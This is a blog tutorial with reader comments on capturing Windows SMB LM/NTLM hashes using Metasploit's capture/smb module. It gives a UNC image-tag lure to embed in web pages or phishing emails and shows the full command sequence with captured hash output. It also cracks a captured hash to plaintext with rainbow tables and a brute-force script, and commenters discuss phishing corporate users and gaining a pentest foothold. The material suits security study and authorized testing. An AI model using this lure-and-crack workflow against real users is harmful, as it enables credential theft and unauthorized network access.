The SMB Relay module is for doing just what it says, relaying the SMB session back to another host. It used to be the same host but now, post 08-068, you have to pick another system on the network. Doesn't matter what system, just not the same system. (I'll try to cover this in another blog post soon)
Additionally, the SMB Relay module provides a random challenge for each attempt and doesn't log those challenges anywhere that you could go back and use. So that pretty much rules out using the hashes you see in the output for password cracking.
For background it looks like this which looks just like the one that will work :-(
[*] Received 192.168.0.103:2281 XPSP1VM\vmwareXP LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1 |
So what are we to do? Use the SMB Sniffer module of course!
The SMB sniffer module allows you to capture LM/NTLM hashes that can be cracked later. It uses a known challenge key which allows you to crack the hash offline. msf > use auxiliary/server/capture/smb msf auxiliary(smb) > info Name: Authentication Capture: SMB Version: 5966 Provided by: hdm Description: This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. All responses sent by this service have the same hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel or L0phtcrack. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path(\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate. |
We need to force a victim to authenticate to metasploit. The easiest way is to embed a UNC link into a webpage or email.
Example: img src="\\networkIP\share\1.gif"
Once the victim's browser tries to authenticate, the sniffer module will capture the hashes (which can be cracked later using rainbow tables). You'll notice the difference between this module and SMB Relay which issues a random challenge making cracking impossible. So if you want to crack passwords, use the server/capture/smb auxiliary module, if you want to try to get a shell use the smb_relay exploit module.
msf > use auxiliary/server/capture/smb msf auxiliary(smb) > run [*] Auxiliary module running as background job msf auxiliary(smb) > [*] Server started. [*] Captured 192.168.0.101:57794 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1 [*] Captured 192.168.0.101:44641 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1 [*] Captured 192.168.0.101:49777 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1 |
We can now use HALFLM rainbow tables with the 1122334455667788 challenge to crack the first half of the password.
**We only take the first 16 characters of the LM hash output
LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d
We can then use rainbow tables to crack the first half:
$ ./rcracki *.rti -h 76365e2d142b5612 halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti: reading... 264241152 bytes read, disk access time: 4.97 s verifying the file... searching for 1 hash... plaintext of 76365e2d142b5612 is PASSWOR cryptanalysis time: 5.24 s statistics ------------------------------------------------------- plaintext found: 1 of 1 (100.00%) total disk access time: 4.97 s total cryptanalysis time: 5.24 s total chain walk step: 1783216 total false alarm: 591 total chain walk step due to false alarm: 703255 result ------------------------------------------------------- 76365e2d142b5612 PASSWOR hex:50415353574f52 |
You will have to guess or bruteforce the rest :-( but thankfully there is a tool in your metasploit tools directory to help you do just that!
$ ruby halflm_second.rb Usage: halflm_second.rb OPTIONS: -h Display this help information -n -p $ ruby halflm_second.rb -n 76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d -p PASSWOR [*] Trying one character... [*] Cracked: PASSWORD |
Great Work. Very Interesting.
ReplyDeleteCheers on the top 5 ranking. You deserve it. Lots of work goes into these articles.
Looking forward to the article about SMB relaying. Does the 3rd party in the attack have to be a DC or will any domain member work?
Very interesting article..
ReplyDeleteBtw did you leave a number in the challenge out on purpose or is it a type mismatch..
i didnt leave anything out on purpose. can you give me a bit more detail on what you are asking?
ReplyDeletenice work but i have one question i saw u didnt use the 112233455667788 challenge.
ReplyDeleteis it necessary for the rainbow attack ?
The SMB sniffer handles the challenge
ReplyDeleteGreat stuff...
ReplyDeleteQuick question though, when I attempt to connect to the share from an XPSP3 VM (not in a domain), the responses it automatically sends first are not the right hashes. The LM hash is always cd72dfc6e6d040a4cd72dfc6e6d040a4cd72dfc6e6d040a4 (tried it from a number of systems). However, if I type the username and pass in the popup auth box, then the right hashes are sent.
What could be the reason that the system is not trying to automatically authenticate with the right creds?
Appreciate the help and congrats on the top 5, you deserve it.
As far I know the static challenge is:
ReplyDelete1122334455667788
so there is a missing 4 in yours.
Regards.
@Cl@rity_533k4
ReplyDeleteyeah, i see now, there was a typo in the post. I added the other 4
@john i have no idea. sorry.
Can you advise where to get the rcracki for linux src code that works? The reerainbowtables forum and bulletin board just seems to think the src code is corrupted and offers very little advice on the multitude of compilation errors. Or perhaps you could advise how to compile in linux. Thanks
ReplyDeleteHmm
ReplyDeleteIf the attacker was sitting out on the Internet and sent a phishing email to users behind a corporate firewall this should still work yes? The clients would open the email, with the url you mention and then attempt to authenticate true?
Authentication only works if site is in internal zone. Else Iexplorer won' t do NTLM auth with logged on credentials
ReplyDeleteInstead of halflm_second.rb, you could use John the Ripper with the jumbo patch applied, which contains:
ReplyDeletehost!user:~/john/john-1.7.6-jumbo-4$ ls doc/NETNTLM_README src/*NET*LM*
doc/NETNTLM_README src/NETLM_fmt.c src/NETNTLM_fmt.c
src/NETHALFLM_fmt.c src/NETLMv2_fmt.c src/NETNTLMv2_fmt.c
This stuff was contributed by JoMo-Kun. You can also find some info on it (and an older revision of it) on his website:
http://www.foofus.net/~jmk/smbchallenge.html
Just thought I'd mention this option as well.
@solardiz
ReplyDeletecool thanks!
Hey man great post. My problem now is getting rcracki to compile/install on BT 4. Any suggestions/pointers on how you got yours up and running.
ReplyDelete@aerokid240
ReplyDeletewithout any errors i or anyone else probably cant help you.
@John:
ReplyDeletewindows tries anonymous logons first
Great article Chris.
ReplyDeleteProblem I'm having is that rcracki can't find the hash you mentioned in your article.
1. I copied the four tables and four index files to /tables on a BT5RC2 box.
2. I did rcracki *.rti -h 76365e2d142b5612 and rcracki told me it couldn't find the hash.
Not sure what I did wrong.
Compilation of rcracki went with some warnings but no errors. Binary seemed to work ok just can't find the PASSWOR hash in the downloaded tables. Have you had troubles with corrupted tables maybe?
Chris, your article is 3 years old and still providing value! Just helped me in a pentest to crack the password for an LM challenge/response I gathered from an ettercap smb mitm and gain that first foothold. One thing that should be noted for everyone, which Chris did use but I missed it the first around, is you *must* use msf's "auxiliary/server/capture/smb" Some ettercap mitm smb videos use the smbrelay exploit instead. Do *not* use smbrelay if your goal is to crack LM challenge/response passwords using rainbow tables because it will not set the server challenge to be 1122334455667788 (capture/smb does) and the stock lhhalfchall rainbow tables out on the net (GARR) appear to have been generated using that default challenge. Of course you could generate your own rainbow tables using your server challenge or rely on John or Cain brute force with a supplied challenge but good luck with that finishing within your engagement timeframe if it's a decent password.
ReplyDeleteThis does not work if the user is using chrome or firefox.
ReplyDelete